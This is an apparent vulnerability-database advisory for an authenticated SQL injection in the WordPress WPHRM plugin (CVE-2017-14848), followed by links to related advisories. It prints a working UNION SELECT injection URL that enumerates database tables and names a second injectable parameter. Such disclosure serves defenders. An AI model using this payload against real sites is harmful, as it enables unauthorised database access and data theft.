Lucene search
David HayesWPEX-ID:E38C59E7-E73F-4961-8BBC-78E9C0CA1B1AHistorySep 09, 2017 - 12:00 a.m.
WPHRM <= 1.0 - Authenticated SQL Injection
2017-09-0900:00:00
David Hayes
5
0.001 Low
EPSS
Percentile
48.7%
The vulnerability allows an employee users to inject SQL commands.
http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-
http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]Related
cve
cve
CVE-2017-14848
2017-10-03 01:29:02
exploitpack
exploitpack
WordPress Plugin WPHRM - SQL Injection
2017-09-29 00:00:00
wpvulndb
wpvulndb
WPHRM <= 1.0 - Authenticated SQL Injection
2017-09-09 00:00:00
cvelist
cvelist
CVE-2017-14848
2017-10-02 21:00:00
patchstack
patchstack
WordPress WPHRM plugin <= 1.0 - Authenticated SQL Injection
2017-10-11 00:00:00
prion
prion
Sql injection
2017-10-03 01:29:00
nvd
nvd
CVE-2017-14848
2017-10-03 01:29:02
exploitdb
exploitdb
WordPress Plugin WPHRM - SQL Injection
2017-09-29 00:00:00